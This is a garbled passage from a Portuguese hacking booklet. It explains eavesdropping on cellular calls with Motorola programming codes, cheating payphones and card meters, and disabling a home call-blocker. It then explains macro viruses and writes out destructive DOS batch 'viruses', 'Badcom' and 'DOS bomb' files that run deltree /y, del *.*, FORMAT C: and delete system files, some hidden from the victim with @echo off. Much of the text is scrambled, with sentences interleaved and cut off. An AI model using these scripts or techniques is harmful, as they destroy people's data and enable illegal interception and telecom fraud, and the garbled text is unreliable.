os avisamos que fazer escuta celular e ilegal de acordo com a ECPA, e estas in ente para uso e

opósito educacional, deixando claro que não me responsabilizo lo mau uso das informações aqui contidas. TV VHF canais 70 - 83 gue a melhor distribuição do melhor tronco usado pelos celulares.

ste e o que distribui nesse fluxo. Sintonize esses canais, ustando-os a sua atual freqüência e você estará preparado para

escuta. Cada canal da TV obrigara 5 MHz com ótimo ntrole de sintonia. Se mesmo assim você não tiver uma

ata você precisara ler sobre freqüência e terá uma boa obter uma exata. Se a sensibilidade não estiver boa,

, ou perto de uma freqüência exata, a coisa. Você poderá também pegar

ócios no tronco móvel se o mesmo estiver nsmissões não serão ilegais a menos que a conversa

o você poderá usar a velha TV para achar que use freqüências de 800 MHz ou

C5. Escuta celular

i tem diversão, e como tem... Você não tem idéia da importância de uma escuta celular! Faça isso perto de um banco e você

N

formações são exclusivamprpepeEajfazer acofreqüência exidéia de comomesmo você estando na cidadevocê pegara algumtransmissões de negfechado, as traesteja codificada, entãoutro local de negócios superior.

A

Terrorismo Tecnológico Aprenda Para Sobreviver

126

entendera. Para começar, esqueça todos os papeis laminados que você já usou na sua vida, tanto para escuta celular quanto para clonal, como já mostrei lá em cima, que não precisara de papel alumínio. Tudo que você vai precisar e de um celular Motorola! Repito: Meu celular para testes e um Motorola Elite II. Bom, dando

icio a explicação de escuta celular, você tem que entrar no modo programação do seu celular. Para isso precisa digitar: FCN 00 **

83 78 66 33 STO. Agora d vira como um ENTER da a máquina no seu celular. Ai você escolhe a freqüência. Tem

tavam fazendo escuta celular muito facilmente e resolveram

ficultar. Os celulares atuais estão usando apenas duas qüências, que são 300 MHz e 800 MHz. Para acessa-las, você

precisa entrar n depois 08# e pois 11300# (no caso da de 300 MHz) e # para dar um "encher".

inde

igite # # que sersugente ai falando que só existem duas freqüências, mas isso e bobagem de quem não tem mais o que fazer e fica tirando a esperança de listeners de plantão! O que essas pessoas ficam falando e que só existem as freqüências fortes e que as de sinais intermediários não podem ser burladas. BULLSHIT! O problema e que essas pessoas não sabem que os celulares novos não pegam outras freqüências mais, pois as empresas perceberam queesdifre

o modo de programação, digitar #deSe mesmo assim não pegar, vai pro centro da cidade, lá eu te garanto, a não ser que você more numa floresta. Use os canais 300, 385, 799, 991!

5.8 Telefones Públicos

Índice

Terrorismo Tecnológico Aprenda Para Sobreviver

127

D1. Cartão

2. Grafite D3. Esmalte de Unh

4. Água Cândida

7. Cartões Infinitos 8. Plucking Block Line 9. Aretha Sem Fichas

D10. Fazendo Orelhao To

ote o cartão normalmente, assim que a pessoa atender segure o mero 9 e retire o cartão, fique segurando o número 9 ate acabar falar! Assim você poderá fazer ligações com o cartão e gastar

apenas uma unidade ém funciona com o (zero).

a assim, ele tem uns 50 fuziveiszinhos, cada ligação gasta

om força, bote no lefone publico e pronto, mas lembre-se, rabisque com força e mpre que o grafite começar a acabar passe o grafite novamente!

Da Incolor

DD5. Papel Alumínio D6. Silicone DDD

car Sozinho

D1. Cartão Bnúde

do cartão. Este truque tamb0

D2. Grafite O grafite e um material super condutor de energia, e o cartão funcionele queimado um fuzível, então o nosso amigo grafite que e condutor de eletricidade não deixa queimar os fuzíveis. Proceda da seguinte maneira: rabisque os 2 lados do cartão ctese

D3. Esmalte de Unha Incolor

Terrorismo Tecnológico Aprenda Para Sobreviver

128

O esmalte impede que esses fuzíveis queimem, faça também essecom os cartões dparte de traz do cartão, e no de vídeo game passe na parte magnética!

e vídeo game (divertilandia)! Passe esmalte na

da fita

D4. Água Cândida

folha! Dai, coloque o de ndida (Vá a uma loja de limpeza e peça se não 3 ou 4 dias a tinta do cartão ira sair, depois

ações ficarão infinitas (também se pode usar água nitária).

D5. Papel Alumínio

Pegue o cartão telefônico novinho emmolho na água câsouber), depois depegue papel alumínio e cubra as partes metálicas com o papel alumínio, então coloque o cartão no orelhão, ligue e faça a festa porque as ligsa

E só pegar um pedaço de papel alumínio e enrolar no cartão, pode usar a vontade...

D6. Silicone Este e o método mas fácil e comprovado por mim. Pegue aquela silicone (transparente) e passe bem fina (fina mesmo) camada de silicone por cima, deixe secar e mais tarde você Vera um cartão que funciona infinitamente!

D7. Cartões Infinitos

Terrorismo Tecnológico Aprenda Para Sobreviver

129

Atenção: esta dica tem que ser realizada com muita paciência, pois você errar apenas um detalhe estraga tudo! Primeiramente nsiga um estúpido cartão telefônico zerado! Lixe ele com aquela

lixa bem fina e d 3 ou 4 minutos. assados então cerca de 3 a 4 minutos percebera que a tinta do

ra já tiver totalmente desaparecida você percebera como a confecção

---------------

Em cada bolinha ligada por um fio que nem diz o -o )

coloque um papel laminado bem fino para interligar nhas. | Ou também pode ser usado um fio bem fino. |

============ | bolinha 1|

_____ / \ _____ /

amigo papel laminado ou fio no e pronto!

seco

eixe-o em repouso durante Pcartão nas costas da figura saiu. Quando a tinta nas costas da figuesdo cartão e uma merda. E um negocio desse tipo: Costas do cartão --| o-o o-o o-o | | o-o o-o o-o |desenho ( o| o-o o-o o-o |as duas boli| o-o o-o o-o| o-o o-o o-o----------------- _____ ____ / \ / \ / \ / \ | bolinha 1|\ / \ / \ Cubra da bolinha 1 ate a 2 com o nossofi

D8. Phucking Block Line

Terrorismo Tecnológico Aprenda Para Sobreviver

130

Essa técnica e meio forçada, mas funciona. Nosso alvo saBLOCK LINE. Bem, isso e só uma parte porque já estamos imaginando uma matéria futura sobre o si

ão aqueles parelhos que bloqueiam chamadas telefônicas, o tão temido

stema, porém englobando-de forma muito mais ampla e falando mais dos detalhes técnicos. or enquanto espero que isso quebre o galho. A primeira coisa que ve ser feita e descobrir se o problema e realmente o BLOCK LINE

e se a linh Antes de do olhe se a senha padrão que e 222 não foi mudada. Agora

ste método só funciona em telefones antigos, aqueles a base da hinha ou da moedinha (se estiver nos EUA, usa o Rex Box ).

Por exemplo, (número

tício). Primeiro voce deve diminuir de 10 todos os números que

o Pde

a não foi bloqueada na companhia telefônica.tuprocure o telefone principal da casa, aquele que quando desligado desliga a todos da casa. Abra ele com uma chave de fenda e procure uma caixinha preta escrita Bloch line. Abra agora também o block line, com cuidado pra não quebrar. Apos ter feito isso tire a película que cobre a placa do aparelho block line e exponha o circuito à luz fluorescente (raios ultravioleta). Pronto, você apagou todas as informações da placa! Agora e claro que as pessoas nem vão desconfiar qual o problema...

D9. Orelhão Sem Fichas Efic

o número que você quer ligar e 823-2647 ficcompõem o telefone a ser discado, no caso esse telefone ficaria como segue abaixo. Número a ser discado: 823-2647 ORIGINAL (10 - 8) = 2 (10 - 2) = 8 (10 - 3) = 7

Terrorismo Tecnológico Aprenda Para Sobreviver

131

(10 - 2) = 8 (10 - 6) = 4 (10 - 4) = 6

0 - 7) = 3 VO NÚMERO

novo número será: 287-8463 O que você vai ter que fazer e bater no bocal do telefone o número de vezes correspondente a subtração. Bata 2 vezes no bocal ( intervalo de 2 segundos ) Bata 8 vezes no bocal ( intervalo de 2 segundos ) Bata 7 vezes no bocal ( intervalo de 2 segundos ) Bata 8 vezes no bocal ( intervalo de 2 segundos ) Bata 4 vezes no bocal ( intervalo de 2 segundos ) Bata 6 vezes no bocal ( intervalo de 2 segundos ) Bata 3 vezes no bocal ( intervalo de 2 segundos ) Desta maneira você poderá fazer ligações gratuitas. Quando estiver ágil poderá ligar mais rápido, ai fica fácil!

D10. Fazendo Orelhão Tocar Sozinho Trata-se de como fazer um telefone publico tocar. E muito simples, não vou explicar como esse código funciona, pois embora pareça simpscc amos supor que você esteja na minha cidade e queira fazer esse método, então você digitaria no telefone publico 9090222999999999999999999, espere um pouco e você escutara aquela mulher da telefonia falando: "Chamada a cobrar, para aceitá-la, continue na linha apos a identificação..." Assim que a mulher começar a falar, desligue o telefone, saia de perto e espere.

(1|_______ NO O

les foi bem complexo para descobrir, já que envolveu todo o istema de telefonia. Apenas chegue no orelhão e digite o código de hamada a cobrar (varia de cidade para cidade), no caso da minha idade o código e 9090. V

Terrorismo Tecnológico Aprenda Para Sobreviver

132

O telefone começara a tocar em uns 30 segundos, e com certeza valera a pena ver aquele bando de lammers ignorantes atendendo!

5.9 Observações sobre clonagem

A cl nagem é algo muito comum cos os celulares, tambem não era de se esperar outra coisa já que une a facilidade de fazela com os altos precos da tarifacao celular. Com o CDMA as operadorar dizem que não é possivel fazer a clonagem, pura mentira, já que perto de aeroportos por exemplo o sinal se torna analogico, e com um simples escanner de sinais é possivel pegar o codigo Hex, entao tomem cuidado ao ir nesses lugares, ou travem o seu celular para apenas funcionar em modo Digital. Outra onda crescente é colocar linhas de orelhao nos celulares. Isto funciona pois a linha analogica funci na parecidamente com a do celular. Entao da para se fazer esta malandragem com cerca de 20 celulares para cada linha do orelhao. Isso tudo é CRIME!

o

o

Terrorismo Tecnológico Aprenda Para Sobreviver

133

Capítulo VI

Vírus - Sem dúvida nada mais assusta usuários e administradores do que os vírus, estas pragas cibernéticas estão se ma força maior e numa escala geométrica.

espalhando nos sistemas a cada dia com u

Terrorismo Tecnológico Aprenda Para Sobreviver

134

Introdução

Navegando na Internet, lendo e-mails, baixando arquivos ou programas, lendo um disquete de um amigo ou até um cd-rom de uma banca de jornal podemos pegar um vírus. Qualquer que seja o tipo extensão que o arquivo tiver não podemos descartar a hip

você executar uma tarefa de forma repetitiva no Microsoft Wo

único comando para executar uma tarefa automaticamente e o woed já vem com vários macros instalados e você ainda pode configurar um novo macro.

2. Para combinar vários comandos; por exemplo, inserir uma tabela com bordas e tamanho específico, e com um determinado número de linhas e colunas.

3. Tornar uma opção de caixa de diálogo mais acessível.

4. Automatizar uma seqüência complexa de tarefas.

O Word oferece duas maneiras de criar uma macro: a gravação de

ótese de ser um trojan ou vírus. Mesmo em uma foto ou em um Mp3 ele pode vim escondido e infectar todo o sistema.

6.1 Vírus de macro

Serd, poderá automatizá-la usando um macro. Um macro é uma

seqüência de comandos e instruções do Word que você agrupa como um

Algumas utilizações típicas dos macros são:

1. Acelerar as tarefas rotineiras de edição ou formatação.

macro e o Editor do Visual Basic.

Terrorismo Tecnológico Aprenda Para Sobreviver

135

Para acessar rapidamente a macro, você poderá atribuí-la a uma barra de ferramentas, um menu ou teclas de atalho. Para exe

Se você der a um novo macro o mesmo nome de um comando inte

o, se você gravar um novo macro e nomeá-la ArquivoFechar, ela ficará anexada ao comando Fechar. Quando você escolher o comando echar, o Word executará as novas ações gravadas.

O QUE É UM VÍRUS DE MACRO?

ionar em nív to é ele age no próprio sistema como o Windows 9X, Windows ME... e até alguns no Unix. Muitas vez o S.O., mas sim em nível aplicativos.

nco de dados, utilizam linguagens de macro. E muitas aplicações têm a função de auto-executar estes macros, esses por sua vez serv m para o funcionamento do aplicativo.

Porém e anificar seriamente to ério perigo para usuários de computadores que pensavam que arquivos de dados não machucavam seu sistema.

cutar a macro, basta clicar no botão da barra de ferramentas ou no comando de menu, ou pressionar as teclas de atalho.

rno do Word, as ações do novo macro substituirão as ações existentes. Por exempl

F

Os vírus comuns geralmente se concentram em funcel de sistemas operacionais, is

es os programadores que o criam os fazem trabalhar não n

Alguns aplicativos que trabalham com planilhas eletrônicas, processadores de texto e ba

e

sses macros se forem reescritos, podem ddo o sistema. Essa combinação fornece um s

Então cada vez que o aplicativo é aberto, acaba executando

automaticamente esta macro e o vírus ou trojan se espalha no sistema.

Terrorismo Tecnológico Aprenda Para Sobreviver

136

Ele pode ter varias finalidades, como roubar informações, atrapalhar oredisco rígido ou infectar arquivos comuns a ele como alguns que apenas estragam documentos do Microsoft Word.

Removendo um vírus de macro.

sistema, apagar arquivos de seu disco rígido, nomear arquivos existentes, copiar arquivos pessoais de seu

- opção comand do arquivo e do normal.dot

- Caso o arquimacros

e em segurança de macro.

Para remoçar siga os pacos a seguir:

Inicie o Word -

Se o arquivo infectado já estiver aberto, no utilitário escolha ao de macro, lá apague todas os macros

vo não estiver aberto então apague somente os do normal.dot

Alterar o nível de segurança para proteção contra vírus de macro

. - Em ferramentas, clique em opções

- Clique na guia segurança.

- Em segurança de macro, cliqu

Terrorismo Tecnológico Aprenda Para Sobreviver

137

- Clique na guia segurança que deseja usar.

nível de segurança e selecione o nível de

Como eliminar seqüelas dos vírus?

ras de Ferramentas personalizadas), elas serão perdidas. Mas pelo menos, você tem a certeza de que as seqüelas sumirão.

Agora, de nada a inda tiver algum

do mento do Word tador, que pode infectar o NORMAL.DOT novamente a qualquer momento. Passe o antivírus antes d

Depois de terminar o reparo, não esqueça de colocar o novo

Pode ser que, mesmo depois de eliminado o vírus de macro, ainda restem algumas seqüelas no seu Word: menus faltando, botões a menos, travamentos, combinações de teclas desativadas.

Primeiro, tente seguir as dicas que você encontra nesta pagina, no site da McAfee: http://www.mcafee.com/t0118.html. Lá, você pode retirar o programa DocFix, especifico para resolver estes problemas.

Se não der certo, há uma solução radical, mas eficiente, a ser tentada em ultimo caso. Delete o arquivo NORMAL.DOT automaticamente, o Word criara outro NORMAL.DOT, com as configurações padrão do programa. A desvantagem e que você perderá as suas configurações personalizadas: se você tinha alguma configuração personalizada (Autotexto, Macros, bar

dianta tudo isto se você a infectado no seu compucu

e fazer o descrito acima.

NORMAL.DOT como somente-leitura.

Terrorismo Tecnológico Aprenda Para Sobreviver

138

Guia o que fazer ao encontrar um vírus de

• Reparar o arquivo – cer de antivírus conseguem remover o vírus e manter a integridade e o arquivo funcionando descontaminação. O antivírus deve remove

macro?

tas ferramentas de um arquivo

perfeitamente após suar o vírus do arquivo, e caso a ameaça for

um worm ou Cava• Colocar o arq

Torna o arquivo inacessível para qualquer programa que não o próprio antivírus. Dess abrir o arquivo por acaso e, assim, dissem

• Excluir o arquivoobs: Use essa opção onar.

É muito importante inais comuns de um vírus: mensagens incomuns que são exibidas na tela, desempenho d apacidade de acessar sua

podem conter vírus. V tes e unidades antes de copiar ou abrir arquivos, ou antes, de iniciar o computador a p

Tenha pelo menos de detecção de vírus comercial e use-o regularmente para verificar se há vírus no seu computador. Certifique-se de obter os mais recentes arquivos de

lo de Tróia, exclui o arquivo. uivo em quarentena

e modo, não é possívelinar o vírus.

caso as duas a cima não funci

6.2 Vírus

conhecer alguns s

e sistema reduzido, perda de dados e inc unidade de disco rígido entre outros.

Programas em disquetes e unidades removíveis tambémerifique todos os disque

artir deles.

um programa

Terrorismo Tecnológico Aprenda Para Sobreviver

139

assinatura de vír do estiverem disponíveis, pois novos vírus são criados todos os dias.

6.3 Ex vírus

Vamos vírus

us para o seu programa quan

emplos de

ver dois exemplos de

Exemplo truição"

Entre n -DOS

Apa S>

copy con arquivo.bat @echo off

@echo destru

del *.com

cd\ del arquivo.bat

1: -- "Autodes

o Prompt MS

recerá assim: C:\WINDOW

Digite: cd..

Aparecerá: C:

Digite: edit destuidor

Na tela azul que aparecerá, digite:

idor is r0x del *.sys del *.exe

cd windows del *.*

Terrorismo Tecnológico Aprenda Para Sobreviver

140

@echo destruidor

Salve o arquivo na opção Salvar Como. Pronto, um arquivo vírus de lote foi criado no seu computador.

Mais ele não fará nada contando que você não digite 'arquivo' no diretório onde ele está!

Remova este arquivo (arquivo.bat) para um disquete, junto a

C:\arquivo.batele um "autoexec.bat", com a linha de comando:

.

Exemplo 2: -- "HiperDestruição"

Entre no Promt Ms-Dos

Digite: cd..

A

Digite: edit Hacker

l que aparecerá, digite:

@Break off

e escolher)

Aparecerá assim: C:\WINDOWS>

parecerá: C:

Na tela azu

@Echo off

@Echo "Destruição total" (uma linha sem nada)

deltree/y C:\(pasta quTipo assim:

Terrorismo Tecnológico Aprenda Para Sobreviver

141

Se colocar -- deltree/y C:\WINDOWS -- Você vai deletar a pasta do Windows, junto com ela as *.DLL e assim já era o

sistema. Ou, pode ser assim -- deltree/y C:\Meus Documentos

Salve o arquivo na opção Salvar Como.

ed, Ping-Pong, Michelangelo...

6.4 Entendendo mais sobre vírus

Vírus de disco - exemplo: Ston

uivos. Da mesma forma que uma biblioteca precisa de um fichário para saber onde se en

ração de entrada e saída precisariam do uso dessa tabela. Salvar ou carregar um arquivo num disquete infectado possibilitaria a ativação do vírus, que pode

írus de Arquivo - exemplo: Jerusalém, Athenas, Freddy

Infectam o BOOT-SECTOR. Esta é à parte do disco

responsável pela manutenção dos arq

contram os livros, um disco precisa ter uma tabela com o endereço dos dados armazenados. Qualquer ope

ria infectar outros disquetes e o disco rígido. V

L, . MN tes vírus se copiam para o inicio ou fim do arquivo. Dessa for amar o programa, o vírus executara junto ao pro

Infectam arquivos executáveis ou de extensão.SYS, .OVU, etc. Es

ma, ao se chgrama. DIR-II Altera a tabela de arquivos de forma a ser chamado antes do

arquivo ou programas.

Terrorismo Tecnológico Aprenda Para Sobreviver

142

Detecção Demora maior na execução de um programa. O sistema fica

ma

o o vírus infe cente, pois sem a em que o arquivo foi atualizado sendo do micro ou por você.

o caso de vírus de disco, é possível que alguns arquivos do disquete desapareçam.

ualmente o aparecimento de mensagem acusando Bad

Cluster em todos os disquetes usados (não confundir com o que aco

a uma dic

C-XT, mas não funciona em um PC-AT.

alerta para modificação em seu arquivo (os novos pro

houver vírus na memória, pois isso infecta todos os arquivos que forem examinados.

Utilização de ferramentas como antivírus para visualização do

setor de Boot most Programa Windows deixa de funcionar ou congela

repetidamente às vezes dando erro de tela azul.

is lento em suas tarefas. Aumento no tamanho dos programas ou arquivos. Alteração na data de criação do programa. Quandcta, o programa aparece uma data de criação repre o sistema grava a última dat

N

Ig

ntece com um disquete de 360k formatado por engano para 1.2 de capacidade). Nos tempos do vírus Ping-pong, essa er

a de infecção. Disquete funciona em P Antivírusgramas antivírus não funcionam quando são modificados pela

infecção de um vírus). Não se deve utilizá-los mesmo quando possível se

ram modificações.

Terrorismo Tecnológico Aprenda Para Sobreviver

143

6.5 Como funciona um programa antivírus - Vigiando a memória do micro para ação de qualquer novo programa Mantendo um arquivo com as características do(s) arquivos

Antes da infecção. Ele examina o CRC, a data de criação do terísticas cuja alteração

denunciaria ação indevida.

- Abrindo cada um dos arquivos passiveis de infecção e

rama de computador que se copia sem intervenção

agem de baixo nível. sse

por uma linha utador.

a de código que ele tem armazenado

de alerta para o usuário.

6.6 Badcom

om são arquivos (.com) em que quando executados realizam determinada seqüência de tarefas no computador.

-

arquivo, o tamanho e outras carac

Examinando o código do programa. Lembrar que o vírus é um proghumana para outro programa ou boot sector. Um programa é composto de às vezes milhares de instruções em linguO que o programa antivírus faz é ler e"texto" dos arquivos executáveis (de extensão.COM, .EXE ou .OVL, (entre outros) e procurarde código característica de vírus de compO programa, ao encontrar uma semelhança entre o código do vírus e a linhna memória como pertencente a um vírus, aciona a mensagem

Badc

Terrorismo Tecnológico Aprenda Para Sobreviver

144

Não é nada mais do que um programinha feito em alguma linguagem e salvo como um arquivo .com que é rodado tanto em dos quanto em Windows.

Para isto deve-se fazer um arquivo de lote com os comandos e pilá-lo

O compilador de arquivos de LOTE (.BAT) é o com certeza é o melhor para fazer esta

Vejamos alguns comandos.

com

BAT2EXEC.COM operação.

ECHO OFF

omando para não ser mostrados as linhas de comando em uma um

anela.. C:\DIR

strados.

LS

la.

O

ativar o comando @ECHO OFF, e mostrar caracteres em ma janela xemplo: ECHO "Mensagem" Irá mostrar a mensagem na janela,

utomaticamente retorna a não aparição de comandos na anela.

r um arquivo com este comando, é necessário o comando ,

@ Cjanela do MS-DOS, Exemplo: Colocando o comando DIR em Badcom sem o @ECHO OFF no prompt ele mostrará o comando escrito na jCom o comando @ECHO OFF, ele simplesmente elimina os dígitosdos comandos a serem mo C Comando do MS-DOS, para limpar a te ECH Para desuEapós isso aJCriando arquivos com o comando ECHO: Para cria

Terrorismo Tecnológico Aprenda Para Sobreviver

145

exemplo: ECHO Nomedoarquivo.extensão Irá criar o arquivo no ambiente do MS-DOS... Para criar arquivos com textos ou comandos, é necessário fazer o

ra

chamado Eu.BAT (Arquivo de Lote) Com o

ste comando permite esconder um determinado arquivo, torne-o te para leitura, ou torne arquivo do sistema.

ara obter os comandos simplesmente digite na janela do MS-DOS:

ara Criar diretórios MEDODIR

diretórios vazios. NOME DA PASTA VAZIA'

DELETE

ara apagar arquivos, no Badcom é usado da seguinte maneira,

seguinte comando: ECHO ARQ.EXT "Comando ou mensagem" OBS: As aspas são apenas paindicação porém em comandos não funcionam as aspas. Ex: ECHO Eu.BAT DIR Irá criar um arquivocomando DIR dentro do mesmo. ATTRIB EsomenPATTRIB /? MD PEx: MD NO RD Comando para desfazerEX: RD ' DEL ou P

Terrorismo Tecnológico Aprenda Para Sobreviver

146

Para deletar arquivos sem ter problemas de BUG, é necessário fazer com

ndo não tenha a opção (*.*), pois surgirá um prompt de

ntão da seguinte maneira:

EL *.Extensão, exemplo.. para apagar os arquivos .INI do diretório : del c:\windir\*.ini ou use:

uitos não têm conhecimento do que este comando pode causar m um

sistema, pois é usado da maneira básica... o Mais perigoso comando contido em um Badcom.

Uso com BUG:

mais destrutiva, deletando todos os

sar o Deltree de forma destrutiva basta acrescentar a opção

s...

me é um comando para renomear algum arquivo.

que o comaconfirmação de exclusão. Digite e Ddo Windowsc: cd\ cd windir del *.ini DELTREE Me

Este "pode ser"

DELTREE DIRETORIO Só que com este comando, aparecerá a confirmação de exclusão do diretório. Porém ha uma opção no DELTREE que evita a aparição do prompt de confirmação, sendo ela a arquivos de um dir. Para u/Y no mesmo, Exemplo: C:\Deltree /y windows Excluindo window REN Rena

Terrorismo Tecnológico Aprenda Para Sobreviver

147

REN command.com command.cai

C:\> do Ms-dos pelo que

Por exemplo: PROMPT teste:\>

e ou volte para determinada

de

inado comando ... usando o comando CLS, veja:

onde vai ser voltado o

m-se dois ponto antes, outros exemplos são :START

REN Autoexec.bat autoexec.euu PROMPT

Com este comando você pode trocar o você quiser.

C:\> teste:\> GOTO Este comando faz com que o BAT pulparte do Programa. Exemplo: O uso do GOTO é muito usado se quiser que não pare repetir determ @echo off :INI <-- Indica a parte do programacomando Cls Usa :COMEÇO GOTO INI <-- Aqui o comando GOTO, para voltar para o alvo indicado.

Terrorismo Tecnológico Aprenda Para Sobreviver

148

@ECHO OFF

Este comando "esconde" a ação!! Por exemplo, se você escreverdel *.* com o @Echo Off a vítima vai pensar que nada acmas se você não pôr o @Echo Off ela vai ver o que estacontecendo e vai ter tempo de desligar o

onteceu,

á computador!!

(indispensável num Badcon!).

CLS

". Por exemplo, se você quiser que não apareça nada Badcon.

Ex.: @Echo Off

cd windows

cls

ECHO

Este comando "mandar mensagens" para o indivíduo, por exemplo,

exibirá a seguinte mensagem: Você está perdido!!

"Limpa a telaquando a vítima executar o

Del *.*

del *.com del *.ini

se você escrever: @echo off echo Você está perdido!!

O Badcon

CD

Este comando serve para "criar" diretórios, exemplo: MD Hacker cria o diretório Hacker/

Terrorismo Tecnológico Aprenda Para Sobreviver

149

COPY

Serve para "copiar" arquivos, exemplo: :\windows

Ele copiará todos os arquivos soltos em C:\ (menos os diretórios)

arquivos determinados, exemplo: @echo Off

stes comandos ele deletará arquivos determinados, no caso o indispensável para funcionar o Windows. Sem ele

um Deltree, ele pegunta se quer realmente apagar e /y o bug não existe mais e ele

m perguntar a vítima!

RD Hacker

copy c:\*.* c

para C:\Windows

DEL

"Apaga"

cd\windows del win.com Com ewin.com, que énão dá para iniciar o Windows.

DELTREE

"Apaga os diretórios" existentes dentro de outros diretórios, exemplo: Deltree/y c:\ Ele apagará todos o diretórios existentes em c:\ ao contrário do del *.* que só apagaria os arquivos soltos em c:\. Aí você me pergunta: Por que o /y depois do Deltree?? Quando você dá determinado arquivo, mas com estapagará os arquivos direto se

RD

Comando para "desfazer diretórios" vazios no Bad-com, exemplo:

Desfaz o diretório Hacker

Terrorismo Tecnológico Aprenda Para Sobreviver

150

REN

"Renomeia" um arquivo especificado, exemplo:

tá renomeado para Hacker

mando é usado para "formatar" discos como o C:\ ou o A:\.

uer mesmo formatar.

Para números ou letras é necessário o uso do /c, sem o uso do comando /c somente CHOICE, mostrará o prompt: [Y,N]... ComO

RRORLEVEL. IF e ERRORLEVEL é um complemento usado pelo CHOICE Comando que possibilita o desenvolvimento de questões e prompts para o sacaniado: Os c andos CHOICE e IF ERRORLEVEL são comandos que um precisa do outro. Nenhum se mantém sozinho.

DOSKEY

O Doskey serve para "trocar" um comando por outro. Exemplo: DOSKEY DIR CLS Sempre que a vítima digitar DIR sera executado o comando CLS.

GOTO

Serv ara "ir" para determinado ponto do arquivo, exemplo: LOOP (local onde o comando GOTO retornará)

Ren autoexec.bat Hacker

O arquivo es

FORMAT

Este coSó que este comando vai perguntar ao usuário se ele tem a certezaque q

CHOICE

Comando que "possibilita um prompt para resposta". Exemplo: CHOICE /c123456789

o /c e os números irá mostrar: [1,2,3,4,5,6,7,8,9]... comando CHOICE tem que vir sempre acompanhado do IF e

E

om

e p

Terrorismo Tecnológico Aprenda Para Sobreviver

151

DIR GOTO LOOP Com isso o programa ficará dando DIR repetidamente

IF E

"Checa para ver se existe" determinado arquivo, e se existir realiza uma função, se não existir realiza uma outra finção. Exemplo: CD W a no diretorio Windows IF E T WIN.COM GOTO WIN: procura pelo arquivo win.com, se existir ele vai para o WIN:, se não ele vai para linha seguinte. CD W stia o diretorio windows, ele vai tentar o win-95 IF E T WIN.COM GOTO WIN: GOTO FIM: Vai para o FIM: WINDELFIM:Sabendo estes comandos já podemos fazer o nosso 1° Badcon:

Entre no edit do MS-DOS e digite os comandos abaixo e salve como "(nome).bat" (sem aspas e sem parênteses). Nun a extensão ".bat". Para entrar no Edit do MS-DOS, abra o MS-DOS e digite "edit" (sem aspas).

Exemplo de Badcom (obtido na Internet)

@echo off cd\ -----------------------> vai para a unidade de disco C:\ cd windows -------------------> entra no diretório Windows del *.com ---------------------> deleta todos os arquivos com extensão .com del *.sys ---------------------> deleta todos os arquivos com extensão .sys cd\ -----------------------> volta para a raiz de C:\ del command.com -------------------> deleta o arquivo command.com

XIST

INDOWS EntrXIS

IN-95 Como não exi

XIS

: WIN.COM Deleta o win.com Fim do arquivo

ca esqueça que o arquivo deve ser salvo com

Terrorismo Tecnológico Aprenda Para Sobreviver

152

(o do MS-DOS) echo Seu computador acabou de ser invadido por -=|Hacker|=- ----------> exibirá a mensagem digitada

ara escrever a badcom é usado qualquer editor de textos como o EDIT do DOS e depois precisa somente ser compilado.

P

Terrorismo Tecnológico Aprenda Para Sobreviver

153

Capítulo VII Bomba DOS – funcionamento e descrição.

Terrorismo Tecnológico Aprenda Para Sobreviver

154

7.1 O que os hackers chamam de Bomba DOS?

do muito fácil de constrência em program

Bomba DOS não são badcons e nem vírus, é um arquivo com uma única finalidade. Sen uir e um usuário com um pouco de experi ação em lote pode fazer uma Bomba DOS.

A Bomba DOS é um arquivo de lote, (*.BAT) contendo comando DOS com a função somente de destruir e não de recolher informações.

Então desconfie de arquivos BAT, nunca execute sem conferi-lo antes, já que o antivírus ncionar para ele. Para você ve uer editor de texto, desde o E co de notas do Windows,

de programação.

Ele destrói tudo sendo um tema operacional), arquivos, dad brar que As Bombas mais o aquelas que vem no AutoExec.bat, es icamente quando seu micro é ligad icar verificando o conteúdo deste arquivo, sendo assim tome cuidado com programas, jogos, e-mails.

EC > DE > DE E

não vai furificar o conteúdo do arquivo você poderá abri-lo em qualq

dit (DOS), Bloou Word, StarOffice... Só que para isso deve-se ter alguma noção

S.O (Sisos, enfim o que estiver pela frente. Também é valido lem

destrutivas sãte arquivo é executado automato, e não é sempre que você vai f

7.2 Vejamos alguns comandos:

CLS: Limpa a tela.

ECHO OFF : Desliga o atributo de mensagens. HO: Imprimi uma mensagem na tela. ex: ECHO <MensagemL: Apaga arquivos. ex: DEL [caminho] <Nome_do_ArquivoLTREE: Apaga uma estrutura de diretórios. ex: DELTRE

Terrorismo Tecnológico Aprenda Para Sobreviver

155

<diretório> ecla ser presPAUSE: Espera alguma t sionada para continuar a execução.

REN: Renomeia um arquivo REN <Nome_do_Arquivo> <Novo_Nome>

Algu ote:

Obs: Todos comandos escritos em NEGRITO terão que ser escritos no autoexec.bat.

Confirma : <S/N>

Como causar onsiderável.

@ECHO OFF IF EXI

IF S

Outros:

. ex.

ns exemplos de arquivos de l

CLS Disco de sistema inválido

PAUSE inicio da formatação da unidade C

ECHO OFF

um estrago c

ST C:\AUTOEXEC.BAT DEL C:\AUTOEXEC.BAT EXIST C:\CONFIG.SYS DEL C:\CONFIG.SY

Como destruir de vez!

@ECHO OFF

FORMAT C: /A

Terrorismo Tecnológico Aprenda Para Sobreviver

156

APPEND Define um caminho de buscas para arquivos que não foram

encontrados. Parâmetros : path on, off: Aplicará um caminho de busca definido

ATTRIB Esse comando serve pa terminados arquivos.

Parâmetros : +r, -r : Define atributo de leitura

CD Muda para o specificado

CHOICE Esse comando possibilit lha. Necessita do IF e

ERRORLEVEL Parâmetros

/c: Possibilita uma esc lo progamador e não pe

nn: : Define o número de segundos de espera. De 00 a 99 text: Define um texto á ntes das opções de

/s: Faz diferenciação de letras minúsculas e letras ma s

Limpa a tela

DELTREE Deleta etório

/y: Não pede confirmação

D

por Append

ra ocultar de

+h, -h : Define atributo de oculto

diretório e

a uma esco

olha feita pelo default

ser exibido aescolha

iúscula

CLS

um arquivo ou dirParâmetros

DIR á um DIR

Terrorismo Tecnológico Aprenda Para Sobreviver

157

ECHO para exibEste comando serve ir uma escrita. Por

exemplo:

ros: OFF: Não mostra os comandos dados

Goto

o qual ele deve voltar

IF e ERRORLEVEL Complemento do CHOICE. Ele define o que vai acontecer. =)

7.3 Arquivo em Lote

Esta é outra for em precisa compilar é so digitar no promp ndo, como o exemplo a seguir:

copy bat <en

@echo off <en

@echo Fras referência <en

ECHO Quem ler isso é um tonto Ficaria assim:

Tonto !!!! Parâmet

Volta para um determinada parte do arquivo Parâmetros

:START: Marca o local para onde deve voltar START: Indica o alvo para

ma de se fazer um “vírus” em DOS, e nt de coma

con lote.ter>

ter>

e de sua pter>

Terrorismo Tecnológico Aprenda Para Sobreviver

158

<enter>

